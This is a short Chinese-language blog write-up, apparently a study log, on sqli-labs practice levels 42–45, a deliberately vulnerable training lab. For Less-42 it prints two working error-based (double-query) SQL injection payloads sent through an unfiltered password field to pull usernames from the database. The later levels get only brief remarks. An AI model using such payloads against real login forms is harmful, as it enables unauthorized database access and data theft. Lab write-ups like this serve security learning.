sqli-labs Less-42-45

  • Less-42
    摸鱼一天,做个题挽救一下(贼简单的)
    看源码,账号过滤了,密码没过滤
    密码中构造payload盲注即可(因为密码无回显)
    wp里是这样做的,但我觉得也可以双查询报错注入吧,试试就知道了
    构造payload:
login_user=&login_password=2' union select 1,count(*),concat((select username from users limit 0,1),floor(rand()*2))a from users group by a#&mysubmit=Login

login_user=&login_password=0' or (select 1 from (select count(*),concat((select username from users limit 0,1),floor(rand()*2))a from users group by a )b)#&mysubmit=Login
1.png
2.png
  • Less-43
    和上面一样,加了一层括号
  • Less-44
    去掉了sql报错回显,不能双查询注入,只能盲注了
    到这题才想起来这一页题是考察堆叠注入的(笑
    堆叠注入就比较简单了,但是不能读取数据只能写入
    懒得写了(之前有篇强网杯2019 随便注的wp,想看堆叠注入的可以去看看
  • Less-45
    加小括号(最近好多这种,贼无聊
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

友情链接更多精彩内容